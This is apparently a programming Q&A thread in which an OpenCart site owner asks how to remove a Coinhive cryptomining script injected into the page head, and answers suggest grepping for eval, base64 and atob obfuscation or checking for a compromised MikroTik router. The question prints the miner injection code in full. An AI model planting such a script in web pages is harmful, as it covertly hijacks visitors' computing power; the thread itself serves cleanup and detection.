# coinhive script appending Automatically in my website head tag

Tags: php, opencart, malware

My website is infected by below script

```
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
 <script>
    var miner = new CoinHive.Anonymous('79v4xchNCTv4p6KbAFjk95csadPQAzSy');
    miner.start();
</script>
```

It automatically increases my CPU uses upto 100% on website opening and making 
website drastically slow.
I have searched in the full source code of website but not found ant trace of it.
  i have also searched into database but could not found.

please suggest how to remove it from website completely.
my website is php based and created with opencart.

Answer (score 1):

It can be difficult to remove all traces of a hack from a website.

The main thing to look for here will be functions that encrypt code and then run it like:

```
eval(base64_encode(
```

Do a search in your source code and database for base64 and you may find it.

Answer (score 1):

Check for `unespace`, `document.write()`, `eval`, and `atob()` in files.

I assume your website is on Linux so you can `grep` for a string and have it look through the files.

```
grep --include=\*.{php} -rnw '/var/www/html' -e "coinhive"
                  ^php files only  ^location to folder ^ string to search
```

Answer (score -1):

Look at your Router.
If you notice http websites wrapped with frameset, - MirkoTik was hijacked.

1) https://xakep.ru/2018/08/03/mikrotik-under-attack/

2) https://www.zdnet.com/article/mikrotik-routers-enslaved-in-massive-coinhive-cryptojacking-campaign/

3) https://thehackernews.com/2018/09/mikrotik-router-hacking.html